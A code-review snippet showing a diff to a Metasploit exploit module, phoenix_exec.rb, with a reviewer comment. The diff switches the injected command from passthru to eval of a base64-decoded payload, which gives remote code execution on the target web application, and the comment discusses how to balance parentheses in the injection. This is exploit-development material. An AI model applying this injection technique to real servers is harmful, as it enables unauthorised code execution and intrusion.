modules/exploits/multi/http/phoenix_exec.rb

```diff
@@ -68,7 +58,7 @@ def check
 
   def exploit
     encoded = Rex::Text.encode_base64(payload.encoded)
-    http_send_command("passthru(base64_decode(\"#{encoded}\"));")
+    http_send_command("eval(base64_decode(\"#{encoded}\"));")
```

Comment:
The issue is that there are only so many functions that can eval code, and we need to balance the parens.